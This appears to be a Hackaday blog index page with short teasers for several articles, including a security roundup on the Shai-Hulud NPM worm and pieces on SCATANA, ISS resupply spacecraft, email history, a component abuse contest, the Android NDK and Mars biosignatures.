This Week In Security: The Shai-Hulud Worm, ShadowLeak, And Inside The Great Firewall

Hardly a week goes by that there isn’t a story to cover about malware getting published to a repository. Last week it was millions of downloads on NPM, but this week it’s something much more concerning. Malware published on NPM is now looking for NPM tokens, and propagating to other NPM packages when found. Yes, it’s a worm, jumping from one NPM package to another, via installs on developer machines.

It does other things too, like grabbing all the secrets it can find when installed on a machine. If the compromised machine has access to a Github account, a new repo is created named Shai-Hulud, borrowed from the name of the sandworms from Dune. The collected secrets and machine info gets uploaded here, and a workflow also uploads any available GitHub secrets to the webhook.site domain.

How many packages are we talking about? At least 187, with some reports of over 500 packages compromised. The immediate attack has been contained, as NPM has worked to remove the compromised packages, and apparently has added filtering code that blocks the upload of compromised packages.

So far there hasn’t been an official statement on the worm from NPM or its parent companies, GitHub or Microsoft. Malicious packages uploaded to NPM is definitely nothing new. But this is the first time we’ve seen a worm that specializes in NPM packages. It’s not a good step for the trustworthiness of NPM or the direct package distribution model.

Continue reading “This Week In Security: The Shai-Hulud Worm, ShadowLeak, And Inside The Great Firewall”

Radio Apocalypse: Clearing The Air With SCATANA

For the most part, the Radio Apocalypse series has focused on the radio systems developed during the early days of the atomic age to ensure that Armageddon would be as orderly an affair as possible. From systems that provided backup methods to ensure that launch orders would reach the bombers and missiles, to providing hardened communications systems to allow survivors to coordinate relief and start rebuilding civilization from the ashes, a lot of effort went into getting messages sent.

Strangely, though, the architects of the end of the world put just as much thought into making sure messages didn’t get sent. The electronic village of mid-century America was abuzz with signals, any of which could be abused by enemy forces. CONELRAD, which aimed to prevent enemy bombers from using civilian broadcast signals as navigation aids, is a perfect example of this. But the growth of civil aviation through the period presented a unique challenge, particularly with the radio navigation system built specifically to make air travel as safe and reliable as possible.

Balancing the needs of civil aviation against the possibility that the very infrastructure making it possible could be used as a weapon against the U.S. homeland is the purpose of a plan called Security Control of Air Traffic and Air Navigation Aids, or SCATANA. It’s a plan that cuts across jurisdictions, bringing military, aviation, and communications authorities into the loop for decisions regarding when and how to shut down the entire air traffic system, to sort friend from foe, to give the military room to work, and, perhaps most importantly, to keep enemy aircraft as blind as possible. Continue reading “Radio Apocalypse: Clearing The Air With SCATANA”

A New Generation Of Spacecraft Head To The ISS

While many in the industry were at first skeptical of NASA’s goal to put resupply flights to the International Space Station in the hands of commercial operators, the results speak for themselves. Since 2012, the SpaceX Dragon family of spacecraft has been transporting crew and cargo from American soil to the orbiting laboratory, a capability that the space agency had lost with the retirement of the Space Shuttle. Putting these relatively routine missions in the hands of a commercial provider like SpaceX takes some of the logistical and financial burden off of NASA, allowing them to focus on more forward-looking projects.

SpaceX Dragon arriving at the ISS for the first time in 2012.

But as the saying goes, you should never put all of your eggs in one basket. As successful as SpaceX has been, there’s always a chance that some issue could temporarily ground either the Falcon 9 or the Dragon.

While Russia’s Progress and Soyuz vehicles would still be available in an emergency situation, it’s in everyone’s best interest that there be multiple backup vehicles that can bring critical supplies to the Station.

Which is precisely why several new or upgraded spacecraft, designed specifically for performing resupply missions to the ISS and any potential commercial successor, are coming online over the next few years.

In fact, one of them is already flying its first mission, and will likely have arrived at the International Space Station by the time you read this article.

Continue reading “A New Generation Of Spacecraft Head To The ISS”

Forgotten Internet: The Story Of Email

It is a common occurrence in old movies: Our hero checks in at a hotel in some exotic locale, and the desk clerk says, “Ah, Mr. Barker, there’s a letter for you.” Or maybe a telegram. Either way, since humans learned to write, they’ve been obsessed with getting their writing in the hands of someone else. Back when we were wondering what people would do if they had a computer in their homes, most of us never guessed it would be: write to each other. Yet that turned out to be the killer app, or, at least, one of them.

What’s interesting about the hotel mail was that you had to plan ahead and know when your recipient would be there. Otherwise, you had to send your note to their home address, and it would have to wait. Telegrams were a little better because they were fast, but you still had to know where to send the message.

Early Days

An ad from the 1970s with a prominent Telex number

In addition to visiting a telegraph office, or post office, to send a note somewhere, commercial users started wanting something better at the early part of the twentieth century. This led to dedicated teletype lines. By 1933, though, a network of Teletype machines — Telex — arose. Before the Internet, it was very common for a company to advertise its Telex number — or TWX number, a competing network from the phone company and, later, Western Union — if they dealt with business accounts.

Fax machines came later, and the hardware was cheap enough that the average person was slightly more likely to have a fax machine or the use of one than a Telex.

Continue reading “Forgotten Internet: The Story Of Email”

2025 Hackaday Component Abuse Challenge: Let The Games Begin!

In theory, all parts are ideal and do just exactly what they say on the box. In practice, everything has its limits, most components have non-ideal characteristics, and you can even turn most parts’ functionality upside down.

The Component Abuse Challenge celebrates the use of LEDs as photosensors, capacitors as microphones, and resistors as heat sources. If you’re using parts for purposes that simply aren’t on the label, or getting away with pushing them to their absolute maximum ratings or beyond, this is the contest for you.

If you committed these sins against engineering out of need, DigiKey wants to help you out. They’ve probably got the right part, and they’re providing us with three $150 gift certificates to give out to the top projects. (If you’re hacking just for fun, well, you’re still in the running.)

This is the contest where the number one rule is that you must break the rules, and the project has to work anyway. You’ve got eight weeks, until Nov 11th. Open up a project over at Hackaday.io, pull down the menu to enter in the contest, and let the parts know no mercy!

Honorable Mention Categories:

We’ve come up with a few honorable mention categories to get your ideas flowing. You don’t have to fit into one of these boxes to enter, but we’ll be picking our favorites in these four categories for a shout-out when we reveal the winners.

  • Bizarro World: There is a duality in almost every component out there. Speakers are microphones, LEDs are light sensors, and peltier coolers generate electricity. Turn the parts upside down and show us what they can do.
  • Side Effects: Most of the time, you’re sad when a part’s spec varies with temperature. Turn those lemons into lemonade, or better yet, thermometers.
  • Out of Spec: How hard can you push that MOSFET before it lets go of the magic smoke? Show us your project dancing on the edge of the abyss and surviving.
  • Junk Box Substitutions: What you really needed was an igniter coil. You used an eighth-watt resistor, and got it hot enough to catch the rocket motor on fire. Share your parts-swapping exploits with us.

Inspiration

Diodes can do nearly anything.  Their forward voltage varies with temperature, making them excellent thermometers. Even the humble LED can both glow and tell you how hot it is. And don’t get us started on the photo-diode. They are not just photocells, but radiation detectors.

Here’s a trick to double the current that a 555 timer can sink. We’d love to see other cases of 555 abuse, of course, but any other IC is fair game.

Resistors get hot. Thermochromic paint changes color with temperature. Every five years or so, we see an awesome new design. This ancient clock of [Sprite_tm]’s lays the foundation, [Daniel Valuch] takes it into the matrix, and [anneosaur] uses the effect to brighten our days.

Of course, thin traces can also be resistors, and resistors can get really hot. Check out [Carl Bujega]’s self-soldering four-layer PCB. And while magnetism is nearly magic, a broken inductor can still be put to good use as a bike chain sensor.

Or maybe you have a new twist on the absolutely classic LEDs-as-light-sensors? Just because it’s been done since the early says of [Forrest Mims] doesn’t mean we don’t want to see your take.

Get out there and show us how you can do it wrong too.

Going Native With Android’s Native Development Kit

Originally Android apps were only developed in Java, targeting the Dalvik Java Virtual Machine (JVM) and its associated environment. Compared to platforms like iOS with Objective-C, which is just C with Smalltalk uncomfortably crammed into it, an obvious problem here is that any JVM will significantly cripple performance, both due to a lack of direct hardware access and the garbage-collector that makes real-time applications such as games effectively impossible. There is also the issue that there is a lot more existing code written in languages like C and C++, with not a lot of enthusiasm among companies for porting existing codebases to Java, or the mostly Android-specific Kotlin.

The solution here was the Native Development Kit (NDK), which was introduced in 2009 and provides a sandboxed environment that native binaries can run in. The limitations here are mostly due to many standard APIs from a GNU/Linux or BSD environment not being present in Android/Linux, along with the use of the minimalistic Bionic C library and APIs that require a detour via the JVM rather than having it available via the NDK.

Despite these issues, using the NDK can still save a lot of time and allows for the sharing of mostly the same codebase between Android, desktop Linux, BSD and Windows.

Continue reading “Going Native With Android’s Native Development Kit”

Hackaday Links Column Banner

Hackaday Links: September 14, 2025

Is it finally time to cue up the Bowie? Or was the NASA presser on Wednesday announcing new findings of potential Martian biosignatures from Perseverance just another in a long line of “We are not alone” teases that turn out to be false alarms? Time will tell, but from the peer-reviewed paper released simultaneously with the news conference, it appears that biological activity is now the simplest explanation for the geochemistry observed in some rock samples analyzed by the rover last year. There’s a lot in the paper to unpack, most of which is naturally directed at planetary scientists and therefore somewhat dense reading. But the gist is that Perseverance sampled some sedimentary rocks in Jezero crater back in July of 2024 with the SHERLOC and PIXL instruments, extensive analysis of which suggests the presence of “reaction fronts” within the rock that produced iron phosphate and iron sulfide minerals in characteristic shapes, such as the ring-like formations they dubbed “leopard spots,” and the pinpoint “poppy seed” formations.

Continue reading “Hackaday Links: September 14, 2025”